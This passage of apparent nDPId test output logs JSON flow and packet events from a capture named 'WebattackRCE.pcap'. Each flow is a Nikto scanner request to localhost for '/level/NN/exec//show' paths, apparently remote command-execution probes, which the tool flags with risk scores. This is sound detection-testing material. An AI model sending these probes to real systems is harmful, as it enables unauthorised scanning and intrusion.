{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 